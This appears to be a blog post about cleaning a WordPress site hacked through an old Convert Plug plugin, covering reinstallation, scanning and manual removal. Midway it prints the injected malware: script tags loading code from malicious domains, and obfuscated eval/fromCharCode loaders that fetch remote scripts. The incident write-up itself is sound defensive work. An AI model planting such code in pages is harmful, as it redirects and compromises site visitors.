This site was using a old version of convert plug, having a large security flaw allowing hackers to modify any files on the site, unfortunately for this site. Every single file on this site was modified to add a redirect script to send the users into spam. Unfortunately since I can not even login to WordPress to start scanning and cleaning, the only option was to do a server side scan to see what files were infected. Unfortunately it showed almost every single file on the site was infected, 1,788 total.

Because of the severity of this hack the only solution was to take apart the whole site and rebuild, not all was lost. First step is to reinstall core files, then delete and reinstall all the plugins, hopefully by this point the site wont redirect anymore, worst case rename the plugins/themes folders so that they all become inactive. plugins should keep their settings after reinstall so that’s not too much of a headache. The last step is the theme, depending on how custom it is you might be able to just throw a fresh copy on, but most likely not. This will involve scanning the files and manually removing all the hacked code, this can be tedious and very time consuming, But its better then rebuilding the whole site.

Most of the hacks are some JavaScript redirects

<script type='text/javascript' src='https://slow.destinyfernandi.com/same.js'></script>
<script type='text/javascript' src='https://snippet.adsformarket.com/same.js'></script>
<script type='text/javascript' src='https://dl.gotosecond2.com/talk.js?track=r&subid=547'></script>
<script type='text/javascript' async src='https://db.deliverygoodstrategy.com/js.min.js?s=p&'></script>
<script type='text/javascript' async src='https://css.developmyredflag.top/sjquery.min.js?style=prime&'></script>

And we also have some backdoors

<script type="text/javascript">var sadadsf23 = 1; eval(String.fromCharCode(118, 97, 114, 32, 100, 61, 100, 111, 99, 117, 109, 101, 110, 116, 59, 118, 97, 114, 32, 115, 61, 100, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 10, 115, 46, 116, 121, 112, 101, 61, 39, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 39, 59, 10, 115, 46, 97, 115, 121, 110, 99, 61, 116, 114, 117, 101, 59, 10, 118, 97, 114, 32, 112, 108, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 57, 57, 44, 32, 49, 49, 53, 44, 32, 49, 49, 53, 44, 32, 52, 54, 44, 32, 49, 48, 48, 44, 32, 49, 48, 49, 44, 32, 49, 49, 56, 44, 32, 49, 48, 49, 44, 32, 49, 48, 56, 44, 32, 49, 49, 49, 44, 32, 49, 49, 50, 44, 32, 49, 48, 57, 44, 32, 49, 50, 49, 44, 32, 49, 49, 52, 44, 32, 49, 48, 49, 44, 32, 49, 48, 48, 44, 32, 49, 48, 50, 44, 32, 49, 48, 56, 44, 32, 57, 55, 44, 32, 49, 48, 51, 44, 32, 52, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 49, 44, 32, 49, 49, 50, 41, 59, 10, 115, 46, 115, 114, 99, 61, 112, 108, 43, 39, 47, 122, 114, 116, 46, 115, 99, 114, 105, 112, 116, 46, 109, 105, 110, 46, 106, 115, 63, 115, 116, 121, 108, 101, 61, 115, 99, 114, 105, 112, 116, 38, 39, 59, 32, 10, 105, 102, 32, 40, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 117, 114, 114, 101, 110, 116, 83, 99, 114, 105, 112, 116, 41, 32, 123, 32, 10, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 117, 114, 114, 101, 110, 116, 83, 99, 114, 105, 112, 116, 46, 112, 97, 114, 101, 110, 116, 78, 111, 100, 101, 46, 105, 110, 115, 101, 114, 116, 66, 101, 102, 111, 114, 101, 40, 115, 44, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 117, 114, 114, 101, 110, 116, 83, 99, 114, 105, 112, 116, 41, 59, 10, 125, 32, 101, 108, 115, 101, 32, 123, 10, 100, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 39, 104, 101, 97, 100, 39, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 115, 41, 59, 10, 125));</script><script type='text/javascript' async=true>var fgjkghkj4 = 1; var d=document;var s=d.createElement('script'); s.type='text/javascript'; s.async=true;
var pl = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 100, 101, 108, 105, 118, 101, 114, 121, 103, 111, 111, 100, 115, 116, 114, 97, 116, 101, 103, 121, 46, 99, 111, 109, 47);
s.src=pl+'/js.min.js?s=r&'; 
if (document.currentScript) { 
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
}</script>

After trying to remove all the malware manually the site was still redirecting so i put WordFence on to see if it can find and remove anything I missed that might be causing the redirect. as of now the site is still down and the scan is running.

After the scan was complete and all extra unnecessary and hacked files were removed or restored the scan reported that pages have broken links on them. After trying to edit a page and getting redirected myself i have to turn off JavaScript to see the pages, and then I found the script. only solution for this was to manually go though each page and remove them.

after cleaning the pages the scan showed all the posts have it aswell, the custom post types did not show up but i will check them aswell. As suspected all custom post type pages also have the script on them.

Contact Form

close-link